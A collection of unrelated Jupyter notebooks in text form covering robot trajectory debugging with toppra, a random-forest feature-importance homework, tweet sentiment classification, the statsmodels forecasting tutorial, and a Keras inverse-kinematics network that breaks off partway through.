for i, waypt in enumerate(waypts):
print(f'checking waypt {i}')
waypt_min_err = float("inf") # always reset error for current waypt
while k < cs.x.size:
print(f'current k: {k}')
err = np.linalg.norm(cs(cs.x[k]) - waypt)
if err <= waypt_min_err + (i > 0) * 2e-3:
print(f'keeping going right, current err {err}')
waypt_min_err = err
else: # we've found the closest knot at the previous knot, k-1
idx[i] = k - 1
print(f'found higher err: {err}, diff: {err-waypt_min_err}, set idx[{i}] = {k-1}')
break
k += 1
idx[i] = k - 1
assert idx[0] == 0, "The first knot is not the beginning waypoint"
assert all(
idx[1:] != 0
), "Failed to find all original waypoints in CubicSpline"
assert idx[-1] == cs.x.size - 1, "The last knot is not the ending waypoint"
# -
# ### debug
# +
waypts_str ='''[[-5.13672496e-21 2.17090011e+00 1.97420001e+00 -1.33614886e+00
1.68947875e+00 -1.43582082e+00 -1.25112307e+00 7.89370894e-01
1.47137129e+00 1.02121091e+00]
[-3.32828831e-09 2.17275190e+00 1.97231507e+00 -1.33659756e+00
1.68829679e+00 -1.43437290e+00 -1.25026381e+00 7.85554409e-01
1.47030544e+00 1.02154922e+00]
[-5.00686888e-08 2.19915652e+00 1.94552147e+00 -1.34293866e+00
1.67151368e+00 -1.41380286e+00 -1.23804998e+00 7.31321335e-01
1.45512831e+00 1.02636683e+00]
[-1.51639455e-07 2.25779486e+00 1.88627732e+00 -1.35684395e+00
1.63446021e+00 -1.36836183e+00 -1.21104920e+00 6.11465275e-01
1.42149162e+00 1.03704500e+00]
[-3.03510689e-07 2.34875226e+00 1.79503691e+00 -1.37796271e+00
1.57753944e+00 -1.29848599e+00 -1.16947937e+00 4.27032262e-01
1.36948764e+00 1.05355692e+00]
[-4.78252105e-07 2.46180892e+00 1.68324935e+00 -1.40310061e+00
1.50815940e+00 -1.21314013e+00 -1.11858237e+00 2.01450363e-01
1.30527341e+00 1.07395291e+00]
[-5.95908773e-07 2.55269051e+00 1.59602475e+00 -1.42149901e+00
1.45461607e+00 -1.14698601e+00 -1.07892489e+00 2.60696374e-02
1.25434577e+00 1.09014034e+00]
[-6.31483317e-07 2.61303782e+00 1.54313195e+00 -1.43027127e+00
1.42328405e+00 -1.10777235e+00 -1.05507600e+00 -7.89981931e-02
1.22196949e+00 1.10044014e+00]
[-5.83632527e-07 2.64353275e+00 1.52495861e+00 -1.42886245e+00
1.41445374e+00 -1.09627032e+00 -1.04788053e+00 -1.12447031e-01
1.20893061e+00 1.10451031e+00]
[-4.30989161e-07 2.65223694e+00 1.54129899e+00 -1.41384876e+00
1.42881119e+00 -1.11507499e+00 -1.06058168e+00 -7.15113729e-02
1.21707821e+00 1.10131919e+00]
[-3.04006875e-07 2.66843677e+00 1.55857241e+00 -1.39506161e+00
1.44321787e+00 -1.13976073e+00 -1.08208919e+00 -2.32865438e-02
1.23451877e+00 1.09397626e+00]
[-2.62020137e-07 2.71521425e+00 1.55118251e+00 -1.37953508e+00
1.44117415e+00 -1.15030921e+00 -1.10065782e+00 -2.01057959e-02
1.24736989e+00 1.08688331e+00]
[-2.06513036e-07 2.79397821e+00 1.53620076e+00 -1.35511065e+00
1.43577600e+00 -1.16541350e+00 -1.13006961e+00 -2.07504742e-02
1.26745081e+00 1.07552099e+00]
[-1.14120589e-07 2.88239980e+00 1.52467299e+00 -1.32411373e+00
1.43375051e+00 -1.18797719e+00 -1.16710234e+00 -8.90599750e-03
1.29344857e+00 1.06146646e+00]
[-3.92676220e-08 2.94131780e+00 1.51934671e+00 -1.30186725e+00
1.43419385e+00 -1.20551252e+00 -1.19357443e+00 4.58445167e-03
1.31232250e+00 1.05151761e+00]
[-3.08850145e-09 2.96830320e+00 1.51724136e+00 -1.29145217e+00
1.43465161e+00 -1.21389806e+00 -1.20595300e+00 1.15570463e-02
1.32118571e+00 1.04687870e+00]
[ 5.83989512e-22 2.97048521e+00 1.51709998e+00 -1.29059041e+00
1.43471062e+00 -1.21460688e+00 -1.20697606e+00 1.21896211e-02
1.32192147e+00 1.04649639e+00]]'''
vlim_str='''[[-99. 99. ]
[ -2.475 2.475 ]
[ -2.475 2.475 ]
[ -2.15325 2.15325]
[ -2.15325 2.15325]
[ -2.15325 2.15325]
[ -2.15325 2.15325]
[ -2.5839 2.5839 ]
[ -2.5839 2.5839 ]
[ -2.5839 2.5839 ]] '''
alim_str='''[[-85. 85. ]
[ -3.4 3.4 ]
[ -3.4 3.4 ]
[-12.75 12.75 ]
[ -6.375 6.375]
[ -8.5 8.5 ]
[-10.625 10.625]
[-12.75 12.75 ]
[-17. 17. ]
[-17. 17. ]] '''
# -
import numpy as np

waypts = parse_str_arr(waypts_str)
vlim = parse_str_arr(vlim_str)
alim = parse_str_arr(alim_str)
np.savetxt('/src/toppra/tests/dracula/test_waypts_jnt_7.txt', waypts)
data = np.load('/data/toppra/input_data/20210303T182518.144079+0000.npz')
waypts = data['waypts']
vlim = data['vlim']
alim = data['alim']
from toppra.dracula import run_topp_spline, _check_waypts, run_topp_const_accel
cs = run_topp_spline(waypts, vlim, alim, return_cs=True)
cs = run_topp_const_accel(waypts, vlim, alim)
pair_dist = np.diff(waypts, axis=0) # (N-1, N_dof)
i_sign_flip = ( # find where it changes direction
np.where(np.sign(pair_dist[:-1]) != np.sign(pair_dist[1:]))[0] + 1
)
pair_t = np.abs(pair_dist) / vlim[:, 1]
pair_t[i_sign_flip] = np.sqrt( # assume 0 velocity start at max accel
2 * np.abs(pair_dist)[i_sign_flip] / alim[:, 1]
)
t_sum = pair_t.max(axis=1).sum()
min_pair_dist = np.linalg.norm(pair_dist, axis=1).min()
t_sum
instance.path.duration
import toppra as ta
import toppra.algorithm as algo
from toppra import constraint

A_LIM_EPS = 0.07
V_LIM_EPS = 0.12
pc_acc = constraint.JointAccelerationConstraint(
alim - np.sign(alim) * A_LIM_EPS,
discretization_scheme=constraint.DiscretizationType.Interpolation,
)
pc_vel = constraint.JointVelocityConstraint(
vlim - np.sign(vlim) * V_LIM_EPS
)
x = np.linspace(0, 0.03*t_sum, waypts.shape[0])
path = ta.SplineInterpolator(x, waypts.copy(), bc_type="clamped")
instance = algo.TOPPRA(
[pc_vel, pc_acc],
path,
solver_wrapper="seidel",
parametrizer="ParametrizeSpline",
)
traj = instance.compute_trajectory(0, 0)
traj.duration
A_LIM_EPS = 0.07
V_LIM_EPS = 0.12
pc_acc = constraint.JointAccelerationConstraint(
alim - np.sign(alim) * A_LIM_EPS,
discretization_scheme=constraint.DiscretizationType.Interpolation,
)
pc_vel = constraint.JointVelocityConstraint(
vlim - np.sign(vlim) * V_LIM_EPS,
)
x = np.linspace(0, 0.5*t_sum, waypts.shape[0])
path = ta.SplineInterpolator(x, waypts.copy(), bc_type="clamped")
instance = algo.TOPPRA(
[pc_vel, pc_acc],
path,
solver_wrapper="seidel",
parametrizer="ParametrizeConstAccel",
gridpt_min_nb_points=1000, # ensure eps ~ O(1e-2)
)
traj = instance.compute_trajectory(0, 0)
# + tags=[]
np.savetxt('/src/toppra/tests/dracula/test_waypts_jnt_6.txt', waypts)
# -
V_MAX = np.array([2.1750, 2.1750, 2.1750, 2.1750, 2.6100, 2.6100, 2.6100])
A_MAX = np.array([15, 7.5, 10, 12.5, 15, 20, 20])
|
tests/dracula/spline_tests.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] pycharm={"name": "#%% md\n"}
# ## Topic: "Supervised Learning"
#
# ### *Task 3
# Call up the documentation for the RandomForestRegressor class
# and find the information on the feature_importances_ attribute.
# Using this attribute, find the sum of all the importance scores
# and determine which two features are the most important.
#
# +
import pandas as pd
import numpy as np
from sklearn.datasets import load_boston
BP = load_boston()
X = pd.DataFrame(BP.data, columns=BP.feature_names)
y = pd.DataFrame(BP.target, columns=['price'])
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)
from sklearn.ensemble import RandomForestRegressor
model = RandomForestRegressor(n_estimators=1000, max_depth=12, random_state=42)
model.fit(X_train, y_train.values[:,0])
# -
# ?RandomForestRegressor
# >**feature_importances_** : ndarray of shape (n_features,)
# The impurity-based feature importances.
# The higher, the more important the feature.
# The importance of a feature is computed as the (normalized)
# total reduction of the criterion brought by that feature. It is also
# known as the Gini importance.
# Warning: impurity-based feature importances can be misleading for
# high cardinality features (many unique values). See
# :func:`sklearn.inspection.permutation_importance` as an alternative.
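# As the docstring above warns, impurity-based importances can be biased for
# high-cardinality features, and `sklearn.inspection.permutation_importance`
# is the suggested alternative. A minimal sketch of how it is called (on a
# synthetic regression dataset, since `load_boston` was removed from recent
# scikit-learn releases):

```python
from sklearn.datasets import make_regression
from sklearn.ensemble import RandomForestRegressor
from sklearn.inspection import permutation_importance
from sklearn.model_selection import train_test_split

X, y = make_regression(n_samples=300, n_features=5, n_informative=2, random_state=42)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)

model = RandomForestRegressor(n_estimators=100, random_state=42).fit(X_train, y_train)

# Importance = mean drop in score when a feature's column is shuffled
result = permutation_importance(model, X_test, y_test, n_repeats=10, random_state=42)
print(result.importances_mean)  # one value per feature
```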
model.feature_importances_
s=pd.Series(model.feature_importances_, index=BP.feature_names)
s
s[s>0.3]
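# The task also asks for the sum of all the importance scores: for a fitted
# RandomForestRegressor the normalized importances sum to 1, and
# `Series.nlargest` picks out the top two directly. A sketch on a synthetic
# dataset with placeholder feature names (since `load_boston` is unavailable
# in recent scikit-learn):

```python
import pandas as pd
from sklearn.datasets import make_regression
from sklearn.ensemble import RandomForestRegressor

X, y = make_regression(n_samples=200, n_features=4, n_informative=2, random_state=0)
names = ['f0', 'f1', 'f2', 'f3']  # placeholder feature names

model = RandomForestRegressor(n_estimators=50, random_state=0).fit(X, y)
s = pd.Series(model.feature_importances_, index=names)

print(s.sum())        # normalized importances sum to 1
print(s.nlargest(2))  # the two most important features
```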
X.RM.value_counts().count() / X.RM.count()
X.LSTAT.value_counts().count() / X.LSTAT.count()
# **Both features have a high share of unique values (~90%), which can make the impurity-based importances of the RandomForestRegressor misleading**
# >:Attribute Information (in order):
# - RM average number of rooms per dwelling
# - LSTAT % lower status of the population
#
X.RM.describe()
X.LSTAT.describe()
# **The features RM (average number of rooms per dwelling) and LSTAT (% lower status of the population) show the greatest importance.**
|
homeworks/les05/tlearn05-03.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# ## Required libraries
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from textblob import TextBlob
import re
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.naive_bayes import MultinomialNB
from sklearn.model_selection import train_test_split
from sklearn.pipeline import Pipeline
from sklearn.metrics import confusion_matrix, classification_report,accuracy_score
# ## Reading and Extracting data from .csv files
train_tweets = pd.read_csv('train_tweets.csv')
test_tweets = pd.read_csv('test_tweets.csv')
train_tweets = train_tweets[['label','text']]
test = test_tweets['text']
# ## Exploratory Data Analysis
train_tweets['length'] = train_tweets['text'].apply(len)
fig1 = sns.barplot(x='label', y='length', data=train_tweets, palette='PRGn')
plt.title('Average Tweet Length vs Label')
plot = fig1.get_figure()
plot.savefig('Barplot.png')
fig2 = sns.countplot(x= 'label',data = train_tweets)
plt.title('Label Counts')
plot = fig2.get_figure()
plot.savefig('favour-againt-count-Plot.png')
# ## Feature Engineering
def text_processing(tweet):
#Generating the list of words in the tweet (hastags and other punctuations removed)
def form_sentence(tweet):
tweet_blob = TextBlob(tweet)
return ' '.join(tweet_blob.words)
new_tweet = form_sentence(tweet)
#Removing stopwords and words with unusual symbols
def no_user_alpha(tweet):
tweet_list = [ele for ele in tweet.split() if ele != 'user']
clean_tokens = [t for t in tweet_list if re.match(r'[^\W\d]*$', t)]
clean_s = ' '.join(clean_tokens)
clean_mess = [word for word in clean_s.split() if word.lower() not in stopwords.words('english')]
return clean_mess
no_punc_tweet = no_user_alpha(new_tweet)
#Normalizing the words in tweets
def normalization(tweet_list):
lem = WordNetLemmatizer()
normalized_tweet = []
for word in tweet_list:
normalized_text = lem.lemmatize(word,'v')
normalized_tweet.append(normalized_text)
return normalized_tweet
return normalization(no_punc_tweet)
train_tweets['tweet_list'] = train_tweets['text'].apply(text_processing)
test_tweets['tweet_list'] = test_tweets['text'].apply(text_processing)
train_tweets[train_tweets['label']==1].drop('text',axis=1).head()
# ## Model Selection and Machine Learning
X = train_tweets['text']
y = train_tweets['label']
test = test_tweets['text']
msg_train, msg_test, label_train, label_test = train_test_split(train_tweets['text'], train_tweets['label'], test_size=0.2)
#Machine Learning Pipeline
pipeline = Pipeline([
('bow',CountVectorizer(analyzer=text_processing)), # strings to token integer counts
('tfidf', TfidfTransformer()), # integer counts to weighted TF-IDF scores
('classifier', MultinomialNB()), # train on TF-IDF vectors w/ Naive Bayes classifier
])
pipeline.fit(msg_train,label_train)
# +
predictions = pipeline.predict(msg_test)
print(classification_report(predictions,label_test))
print('\n')
print(confusion_matrix(predictions,label_test))
print(accuracy_score(predictions,label_test))
# -
def form_sentence(tweet):
tweet_blob = TextBlob(tweet)
return ' '.join(tweet_blob.words)
print(form_sentence(train_tweets['text'].iloc[10]))
print(train_tweets['text'].iloc[10])
# +
def no_user_alpha(tweet):
tweet_list = [ele for ele in tweet.split() if ele != 'user']
clean_tokens = [t for t in tweet_list if re.match(r'[^\W\d]*$', t)]
clean_s = ' '.join(clean_tokens)
clean_mess = [word for word in clean_s.split() if word.lower() not in stopwords.words('english')]
return clean_mess
print(no_user_alpha(form_sentence(train_tweets['text'].iloc[10])))
print(train_tweets['text'].iloc[10])
# +
def normalization(tweet_list):
lem = WordNetLemmatizer()
normalized_tweet = []
for word in tweet_list:
normalized_text = lem.lemmatize(word,'v')
normalized_tweet.append(normalized_text)
return normalized_tweet
tweet_list = 'I was playing with my friends with whom I used to play, when you called me yesterday'.split()
print(normalization(tweet_list))
# -
|
Task 2- Favour and Against tweets/notebooks/favour against tweets.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Forecasting in statsmodels
#
# This notebook describes forecasting using time series models in statsmodels.
#
# **Note**: this notebook applies only to the state space model classes, which are:
#
# - `sm.tsa.SARIMAX`
# - `sm.tsa.UnobservedComponents`
# - `sm.tsa.VARMAX`
# - `sm.tsa.DynamicFactor`
# +
# %matplotlib inline
import numpy as np
import pandas as pd
import statsmodels.api as sm
import matplotlib.pyplot as plt
macrodata = sm.datasets.macrodata.load_pandas().data
macrodata.index = pd.period_range('1959Q1', '2009Q3', freq='Q')
# -
# ## Basic example
#
# A simple example is to use an AR(1) model to forecast inflation. Before forecasting, let's take a look at the series:
endog = macrodata['infl']
endog.plot(figsize=(15, 5))
# ### Constructing and estimating the model
# The next step is to formulate the econometric model that we want to use for forecasting. In this case, we will use an AR(1) model via the `SARIMAX` class in statsmodels.
#
# After constructing the model, we need to estimate its parameters. This is done using the `fit` method. The `summary` method produces several convenient tables showing the results.
# +
# Construct the model
mod = sm.tsa.SARIMAX(endog, order=(1, 0, 0), trend='c')
# Estimate the parameters
res = mod.fit()
print(res.summary())
# -
# ### Forecasting
# Out-of-sample forecasts are produced using the `forecast` or `get_forecast` methods from the results object.
#
# The `forecast` method gives only point forecasts.
# The default is to get a one-step-ahead forecast:
print(res.forecast())
# The `get_forecast` method is more general, and also allows constructing confidence intervals.
# +
# Here we construct a more complete results object.
fcast_res1 = res.get_forecast()
# Most results are collected in the `summary_frame` attribute.
# Here we specify that we want a confidence level of 90%
print(fcast_res1.summary_frame(alpha=0.10))
# -
# The default confidence level is 95%, but this can be controlled by setting the `alpha` parameter, where the confidence level is defined as $(1 - \alpha) \times 100\%$. In the example above, we specified a confidence level of 90%, using `alpha=0.10`.
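# The `alpha` value maps to the interval width through the two-sided normal
# quantile used for the error bands. A quick check of that relationship (this
# uses `scipy.stats.norm`, which is not otherwise part of this notebook):

```python
from scipy.stats import norm

def z_for_alpha(alpha):
    # Two-sided critical value for a (1 - alpha) * 100% interval
    return norm.ppf(1 - alpha / 2)

print(round(z_for_alpha(0.05), 3))  # 1.96  -> the default 95% interval
print(round(z_for_alpha(0.10), 3))  # 1.645 -> the 90% interval used above
```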
# ### Specifying the number of forecasts
#
# Both of the functions `forecast` and `get_forecast` accept a single argument indicating how many forecasting steps are desired. One option for this argument is always to provide an integer describing the number of steps ahead you want.
print(res.forecast(steps=2))
fcast_res2 = res.get_forecast(steps=2)
# Note: since we did not specify the alpha parameter, the
# confidence level is at the default, 95%
print(fcast_res2.summary_frame())
# However, **if your data included a Pandas index with a defined frequency** (see the section at the end on Indexes for more information), then you can alternatively specify the date through which you want forecasts to be produced:
print(res.forecast('2010Q2'))
fcast_res3 = res.get_forecast('2010Q2')
print(fcast_res3.summary_frame())
# ### Plotting the data, forecasts, and confidence intervals
#
# Often it is useful to plot the data, the forecasts, and the confidence intervals. There are many ways to do this, but here's one example
# +
fig, ax = plt.subplots(figsize=(15, 5))
# Plot the data (here we are subsetting it to get a better look at the forecasts)
endog.loc['1999':].plot(ax=ax)
# Construct the forecasts
fcast = res.get_forecast('2011Q4').summary_frame()
fcast['mean'].plot(ax=ax, style='k--')
ax.fill_between(fcast.index, fcast['mean_ci_lower'], fcast['mean_ci_upper'], color='k', alpha=0.1);
# -
# ### Note on what to expect from forecasts
#
# The forecast above may not look very impressive, as it is almost a straight line. This is because this is a very simple, univariate forecasting model. Nonetheless, keep in mind that these simple forecasting models can be extremely competitive.
# ## Prediction vs Forecasting
#
# The results objects also contain two methods that allow both in-sample fitted values and out-of-sample forecasting. They are `predict` and `get_prediction`. The `predict` method only returns point predictions (similar to `forecast`), while the `get_prediction` method also returns additional results (similar to `get_forecast`).
#
# In general, if your interest is out-of-sample forecasting, it is easier to stick to the `forecast` and `get_forecast` methods.
# ## Cross validation
#
# **Note**: some of the functions used in this section were first introduced in statsmodels v0.11.0.
#
# A common use case is to cross-validate forecasting methods by performing h-step-ahead forecasts recursively using the following process:
#
# 1. Fit model parameters on a training sample
# 2. Produce h-step-ahead forecasts from the end of that sample
# 3. Compare forecasts against test dataset to compute error rate
# 4. Expand the sample to include the next observation, and repeat
#
# Economists sometimes call this a pseudo-out-of-sample forecast evaluation exercise, or time-series cross-validation.
# ### Example
# We will conduct a very simple exercise of this sort using the inflation dataset above. The full dataset contains 203 observations, and for expositional purposes we'll use the first 80% as our training sample and only consider one-step-ahead forecasts.
# A single iteration of the above procedure looks like the following:
# +
# Step 1: fit model parameters w/ training sample
training_obs = int(len(endog) * 0.8)
training_endog = endog[:training_obs]
training_mod = sm.tsa.SARIMAX(
training_endog, order=(1, 0, 0), trend='c')
training_res = training_mod.fit()
# Print the estimated parameters
print(training_res.params)
# +
# Step 2: produce one-step-ahead forecasts
fcast = training_res.forecast()
# Step 3: compute root mean square forecasting error
true = endog.reindex(fcast.index)
error = true - fcast
# Print out the results
print(pd.concat([true.rename('true'),
fcast.rename('forecast'),
error.rename('error')], axis=1))
# -
# To add on another observation, we can use the `append` or `extend` results methods. Either method can produce the same forecasts, but they differ in the other results that are available:
#
# - `append` is the more complete method. It always stores results for all training observations, and it optionally allows refitting the model parameters given the new observations (note that the default is *not* to refit the parameters).
# - `extend` is a faster method that may be useful if the training sample is very large. It *only* stores results for the new observations, and it does not allow refitting the model parameters (i.e. you have to use the parameters estimated on the previous sample).
#
# If your training sample is relatively small (less than a few thousand observations, for example) or if you want to compute the best possible forecasts, then you should use the `append` method. However, if that method is infeasible (for example, because you have a very large training sample) or if you are okay with slightly suboptimal forecasts (because the parameter estimates will be slightly stale), then you can consider the `extend` method.
# A second iteration, using the `append` method and refitting the parameters, would go as follows (note again that the default for `append` does not refit the parameters, but we have overridden that with the `refit=True` argument):
# +
# Step 1: append a new observation to the sample and refit the parameters
append_res = training_res.append(endog[training_obs:training_obs + 1], refit=True)
# Print the re-estimated parameters
print(append_res.params)
# -
# Notice that these estimated parameters are slightly different than those we originally estimated. With the new results object, `append_res`, we can compute forecasts starting from one observation further than the previous call:
# +
# Step 2: produce one-step-ahead forecasts
fcast = append_res.forecast()
# Step 3: compute root mean square forecasting error
true = endog.reindex(fcast.index)
error = true - fcast
# Print out the results
print(pd.concat([true.rename('true'),
fcast.rename('forecast'),
error.rename('error')], axis=1))
# -
# Putting it altogether, we can perform the recursive forecast evaluation exercise as follows:
# +
# Setup forecasts
nforecasts = 3
forecasts = {}
# Get the number of initial training observations
nobs = len(endog)
n_init_training = int(nobs * 0.8)
# Create model for initial training sample, fit parameters
init_training_endog = endog.iloc[:n_init_training]
mod = sm.tsa.SARIMAX(init_training_endog, order=(1, 0, 0), trend='c')
res = mod.fit()
# Save initial forecast
forecasts[init_training_endog.index[-1]] = res.forecast(steps=nforecasts)
# Step through the rest of the sample
for t in range(n_init_training, nobs):
# Update the results by appending the next observation
updated_endog = endog.iloc[t:t+1]
res = res.append(updated_endog, refit=False)
# Save the new set of forecasts
forecasts[updated_endog.index[0]] = res.forecast(steps=nforecasts)
# Combine all forecasts into a dataframe
forecasts = pd.concat(forecasts, axis=1)
print(forecasts.iloc[:5, :5])
# -
# We now have a set of three forecasts made at each point in time from 1999Q2 through 2009Q3. We can construct the forecast errors by subtracting each forecast from the actual value of `endog` at that point.
# +
# Construct the forecast errors
forecast_errors = forecasts.apply(lambda column: endog - column).reindex(forecasts.index)
print(forecast_errors.iloc[:5, :5])
# -
# To evaluate our forecasts, we often want to look at a summary value like the root mean square error. Here we can compute that for each horizon by first flattening the forecast errors so that they are indexed by horizon and then computing the root mean square error for each horizon.
# +
# Reindex the forecasts by horizon rather than by date
def flatten(column):
return column.dropna().reset_index(drop=True)
flattened = forecast_errors.apply(flatten)
flattened.index = (flattened.index + 1).rename('horizon')
print(flattened.iloc[:3, :5])
# +
# Compute the root mean square error
rmse = (flattened**2).mean(axis=1)**0.5
print(rmse)
# -
# #### Using `extend`
#
# We can check that we get similar forecasts if we instead use the `extend` method, but that they are not exactly the same as when we use `append` with the `refit=True` argument. This is because `extend` does not re-estimate the parameters given the new observation.
# +
# Setup forecasts
nforecasts = 3
forecasts = {}
# Get the number of initial training observations
nobs = len(endog)
n_init_training = int(nobs * 0.8)
# Create model for initial training sample, fit parameters
init_training_endog = endog.iloc[:n_init_training]
mod = sm.tsa.SARIMAX(init_training_endog, order=(1, 0, 0), trend='c')
res = mod.fit()
# Save initial forecast
forecasts[init_training_endog.index[-1]] = res.forecast(steps=nforecasts)
# Step through the rest of the sample
for t in range(n_init_training, nobs):
# Update the results by appending the next observation
updated_endog = endog.iloc[t:t+1]
res = res.extend(updated_endog)
# Save the new set of forecasts
forecasts[updated_endog.index[0]] = res.forecast(steps=nforecasts)
# Combine all forecasts into a dataframe
forecasts = pd.concat(forecasts, axis=1)
print(forecasts.iloc[:5, :5])
# +
# Construct the forecast errors
forecast_errors = forecasts.apply(lambda column: endog - column).reindex(forecasts.index)
print(forecast_errors.iloc[:5, :5])
# +
# Reindex the forecasts by horizon rather than by date
def flatten(column):
return column.dropna().reset_index(drop=True)
flattened = forecast_errors.apply(flatten)
flattened.index = (flattened.index + 1).rename('horizon')
print(flattened.iloc[:3, :5])
# +
# Compute the root mean square error
rmse = (flattened**2).mean(axis=1)**0.5
print(rmse)
# -
# By not re-estimating the parameters, our forecasts are slightly worse (the root mean square error is higher at each horizon). However, the process is faster, even with only 200 datapoints. Using the `%%timeit` cell magic on the cells above, we found a runtime of 570ms using `extend` versus 1.7s using `append` with `refit=True`. (Note that using `extend` is also faster than using `append` with `refit=False`).
# ## Indexes
#
# Throughout this notebook, we have been making use of Pandas date indexes with an associated frequency. As you can see, this index marks our data as at a quarterly frequency, between 1959Q1 and 2009Q3.
print(endog.index)
# In most cases, if your data has an associated date/time index with a defined frequency (like quarterly, monthly, etc.), then it is best to make sure your data is a Pandas series with the appropriate index. Here are three examples of this:
# Annual frequency, using a PeriodIndex
index = pd.period_range(start='2000', periods=4, freq='A')
endog1 = pd.Series([1, 2, 3, 4], index=index)
print(endog1.index)
# Quarterly frequency, using a DatetimeIndex
index = pd.date_range(start='2000', periods=4, freq='QS')
endog2 = pd.Series([1, 2, 3, 4], index=index)
print(endog2.index)
# Monthly frequency, using a DatetimeIndex
index = pd.date_range(start='2000', periods=4, freq='M')
endog3 = pd.Series([1, 2, 3, 4], index=index)
print(endog3.index)
# In fact, if your data has an associated date/time index, it is best to use that even if it does not have a defined frequency. An example of that kind of index is as follows - notice that it has `freq=None`:
index = pd.DatetimeIndex([
'2000-01-01 10:08am', '2000-01-01 11:32am',
'2000-01-01 5:32pm', '2000-01-02 6:15am'])
endog4 = pd.Series([0.2, 0.5, -0.1, 0.1], index=index)
print(endog4.index)
# You can still pass this data to statsmodels' model classes, but you will get the following warning, that no frequency data was found:
mod = sm.tsa.SARIMAX(endog4)
res = mod.fit()
# What this means is that you cannot specify forecasting steps by dates, and the output of the `forecast` and `get_forecast` methods will not have associated dates. The reason is that without a given frequency, there is no way to determine what date each forecast should be assigned to. In the example above, there is no pattern to the date/time stamps of the index, so there is no way to determine what the next date/time should be (should it be in the morning of 2000-01-02? the afternoon? or maybe not until 2000-01-03?).
#
# For example, if we forecast one-step-ahead:
res.forecast(1)
# The index associated with the new forecast is `4`, because if the given data had an integer index, that would be the next value. A warning is given letting the user know that the index is not a date/time index.
#
# If we try to specify the steps of the forecast using a date, we will get the following exception:
#
# KeyError: 'The `end` argument could not be matched to a location related to the index of the data.'
#
# Here we'll catch the exception to prevent printing too much of
# the exception trace output in this notebook
try:
res.forecast('2000-01-03')
except KeyError as e:
print(e)
# Ultimately there is nothing wrong with using data that does not have an associated date/time frequency, or even using data that has no index at all, like a Numpy array. However, if you can use a Pandas series with an associated frequency, you'll have more options for specifying your forecasts and get back results with a more useful index.
|
v0.12.2/examples/notebooks/generated/statespace_forecasting.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/dnhshl/hyperparameter_doe/blob/main/simpleRobot.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="9boAgRMdmlVN"
# # simpleRobot
# A neural network for computing the inverse kinematics of a (very simple) robot with two degrees of freedom.
#
#
#
#
# + [markdown] id="SIzhfha3lF_f"
# ## Load the required libraries
#
# + id="7VG9_6c-mkKe" colab={"base_uri": "https://localhost:8080/"} outputId="c93aad6f-f159-4aae-d2b5-87c1cab779fb"
# !pip install keras_sequential_ascii
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow import keras
from keras import layers
from keras import optimizers
from keras_sequential_ascii import keras2ascii
from google.colab import files
import time
import csv
# + [markdown] id="mlj4ZTeR1Zgp"
# # Hyperparameters
# + id="58mIV_DGsTl1"
# NN Structure Parameter
layer1size = 100
layer2size = 100
layer3size = 100
# Training Parameter
tdatasize = 10000
myoptimizer = optimizers.Adam
learning_rate = 1E-2
batch_size = 32
epochs = 10
# + [markdown] id="tjCih-kdsqgV"
# # Data
#
# Generate training data. This is easy here: for known angles `phi1` and `phi2`, the `x` and `y` position can be computed directly.
#
# For simplicity (to rule out the same position being reachable with different joint configurations), `phi1` is restricted to 0 .. 90 degrees and `phi2` to -90 .. 0 degrees.
# + id="iIbpicffnf5m"
def gen_data(size):
    l1 = 1  # length of the first robot arm
    l2 = 1  # length of the second robot arm
    # phi1 in the range 0 .. 90 degrees
    phi1 = np.random.random_sample(size) * np.pi/2
    # phi2 in the range 0 .. -90 degrees
    phi2 = -np.random.random_sample(size) * np.pi/2
    # Stack the vectors into a matrix
    dout = np.vstack((phi1, phi2)).T
    # Compute x and y
    din = np.array([l1 * np.cos(dout[:,0]) + l2 * np.cos(dout.sum(axis=1)),
                    l1 * np.sin(dout[:,0]) + l2 * np.sin(dout.sum(axis=1))]).T
return (din, dout)
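# A quick sanity check of the forward kinematics that `gen_data` relies on.
# The `forward_kinematics` helper below is illustrative, not part of the
# notebook; it assumes both arm lengths are 1, as above:

```python
import numpy as np

def forward_kinematics(phi1, phi2, l1=1.0, l2=1.0):
    # End-effector position for joint angles phi1, phi2
    x = l1 * np.cos(phi1) + l2 * np.cos(phi1 + phi2)
    y = l1 * np.sin(phi1) + l2 * np.sin(phi1 + phi2)
    return x, y

# Fully stretched arm along the x axis -> approximately (2, 0)
print(forward_kinematics(0.0, 0.0))
# Vertical upper arm, elbow bent back 90 degrees -> approximately (1, 1)
print(forward_kinematics(np.pi / 2, -np.pi / 2))
```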
# + [markdown] id="eCJYxIrS235-"
# # Training data
#
# + id="xW3AAIv828GV"
(din, dout) = gen_data(tdatasize)
# + [markdown] id="KcBfGA3EkHrY"
# # NN
#
# A stack of fully connected layers; the hidden layers use a `tanh` activation.
#
# The squared error is used as the loss function. You can also try [other loss functions](https://keras.io/api/losses/).
#
# Also test different [optimizers](https://keras.io/api/optimizers/).
# + [markdown] id="wGXx8H8NsP8T"
# ## Hyperparameters
# + [markdown] id="edNkRU_JtHHG"
# ## Build the NN
# + id="2aiSNRJGkbEF"
def build_and_compile_model():
model = keras.Sequential([
layers.Dense(layer1size, input_shape=[2,], activation='tanh'),
